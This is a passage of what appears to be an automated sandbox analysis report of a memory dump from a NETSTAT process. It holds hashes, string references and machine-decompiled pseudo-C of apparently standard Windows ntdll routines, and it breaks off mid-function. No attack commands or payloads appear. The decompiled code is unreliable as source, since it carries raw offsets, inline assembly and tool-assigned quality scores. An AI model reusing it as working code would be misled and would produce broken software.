                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: cf7726698438ccb8a4a04392817b788654c1e71bb96689489982a8da1cea1bf4
                • Instruction ID: 4a2db994e93ca9f6ebd405c571f5cfd883751b2ce4076e471d26082e0edb9f26
                • Opcode Fuzzy Hash: cf7726698438ccb8a4a04392817b788654c1e71bb96689489982a8da1cea1bf4
                • Instruction Fuzzy Hash: E031B1B6908305DFC721EF28C8C0A6BBBECEB85654F04092EF99497290D674DD05CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03361B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E03361B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0339BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0339A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0339A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03374620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                0x03361b8f
                0x03361b9a
                0x03361b9c
                0x03361b9e
                0x03361ba3
                0x033b7010
                0x033b7010
                0x00000000
                0x03361ba9
                0x03361ba9
                0x03361bae
                0x00000000
                0x03361bc5
                0x03361bca
                0x03361bcf
                0x03361bd0
                0x03361bd1
                0x03361bd2
                0x03361bd6
                0x03361bdc
                0x03361be0
                0x033b6ffc
                0x033b7000
                0x00000000
                0x033b7006
                0x033b7009
                0x033b7009
                0x03361be6
                0x03361bec
                0x03361c0b
                0x03361c0b
                0x03361c0c
                0x03361c11
                0x03361c12
                0x03361c15
                0x03361c1b
                0x03361c1f
                0x03361c31
                0x03361c33
                0x033b7026
                0x033b7026
                0x03361c21
                0x03361c24
                0x03361c24
                0x03361bee
                0x03361bee
                0x03361bf2
                0x03361c3a
                0x03361bf4
                0x03361bf4
                0x03361c05
                0x03361c05
                0x03361c09
                0x03361c3e
                0x00000000
                0x00000000
                0x00000000
                0x03361c09
                0x03361bec
                0x03361be0
                0x03361bae
                0x03361c2e

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: WindowsExcludedProcs
                • API String ID: 0-3583428290
                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                • Instruction ID: a77baf6d9beefba27663e9a3a4f79c5aaf7b91207fc34938780e66594efb9e3b
                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                • Instruction Fuzzy Hash: D221F536E01628AFDB21DA598CC1FAFF7BDEF80A50F098466F9048BA14D634DC0097A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0337F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                0x0337f71d
                0x0337f722
                0x0337f726
                0x033c4770
                0x0337f765
                0x0337f769
                0x0337f769
                0x0337f732
                0x033c477a
                0x00000000
                0x033c477a
                0x0337f738
                0x0337f73a
                0x0337f73c
                0x0337f73f
                0x0337f746
                0x0337f778
                0x0337f7a9
                0x0337f7a9
                0x0337f754
                0x0337f75a
                0x0337f75d
                0x0337f75f
                0x0337f761
                0x0337f76f
                0x0337f771
                0x0337f771
                0x0337f76f
                0x0337f763
                0x00000000
                0x0337f763
                0x0337f77d
                0x0337f7a3
                0x0337f7a5
                0x00000000
                0x0337f7a5
                0x0337f77f
                0x0337f782
                0x0337f784
                0x0337f786
                0x00000000
                0x00000000
                0x00000000
                0x0337f788
                0x0337f748
                0x0337f74d
                0x0337f78d
                0x0337f793
                0x0337f7b7
                0x0337f7bc
                0x00000000
                0x0337f7bc
                0x0337f798
                0x00000000
                0x00000000
                0x0337f79d
                0x0337f7b0
                0x00000000
                0x0337f7b0
                0x0337f79f
                0x00000000
                0x0337f74f
                0x0337f74f
                0x00000000
                0x0337f74f

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Actx
                • API String ID: 0-89312691
                • Opcode ID: 9fb7c027573bc1ae5db8aba3ef6d7354372b38bc6f76a35b104fefc94ad62281
                • Instruction ID: b50dd88ec487b0543194ae9dc04741d1efd30f214c995e1663125d6bafee14b3
                • Opcode Fuzzy Hash: 9fb7c027573bc1ae5db8aba3ef6d7354372b38bc6f76a35b104fefc94ad62281
                • Instruction Fuzzy Hash: 97118E353086828BEB35CE1D8DD17B6B299BB866A4F28452AF461CB791DA79C8408740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03408DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E03408DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3430d50);
				E033AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E033E5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L033ADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L033ADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E033AD130(_t34, _t39, _t40);
			}





                0x03408df1
                0x03408df1
                0x03408df1
                0x03408df1
                0x03408df1
                0x03408df1
                0x03408df3
                0x03408df8
                0x03408dfd
                0x03408e00
                0x03408e0e
                0x03408e2a
                0x03408e36
                0x03408e38
                0x03408e3c
                0x03408e46
                0x03408e46
                0x03408e36
                0x03408e50
                0x03408e56
                0x03408e59
                0x03408e5c
                0x03408e60
                0x03408e67
                0x03408e6d
                0x03408e73
                0x03408e74
                0x03408eb1
                0x03408ebd

                Strings
                • Critical error detected %lx, xrefs: 03408E21
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Critical error detected %lx
                • API String ID: 0-802127002
                • Opcode ID: d3d173e72c3e06eed45b6fb51031c7d9509648bc9ff039fcb863d3f7cd2e98a8
                • Instruction ID: 70cc13a2cb90a730d911f72b59590fd76ac0715ef8677df66f633e126924261b
                • Opcode Fuzzy Hash: d3d173e72c3e06eed45b6fb51031c7d9509648bc9ff039fcb863d3f7cd2e98a8
                • Instruction Fuzzy Hash: 81113975E14748DADB24CFA88A4579DBBB0EB05314F24426ED429AF3D2C3344602CF59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033EFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                Download Yara Rule
                Strings
                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 033EFF60
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                • API String ID: 0-1911121157
                • Opcode ID: 560c12bb995d4cae17f34f64c46dd95d017ad7b61c8565cc744072ab668e56ea
                • Instruction ID: 4f0c55f7c5447b5703bad386d50d389b0cdbd186e1baf4dcb9a49f544176918f
                • Opcode Fuzzy Hash: 560c12bb995d4cae17f34f64c46dd95d017ad7b61c8565cc744072ab668e56ea
                • Instruction Fuzzy Hash: 3711ED79910654EFDB12EB50CC88F98BBB1FF09704F198154F0086B6A1CB789941DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03425BA5 Relevance: .6, Instructions: 592COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E03425BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3431178);
				E033AD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03424C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0339D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03425542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x34460e8;
								if( *0x34460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x34460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03399710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03396DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0339F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0339F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0339F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0339FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0339FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0339F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0339F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
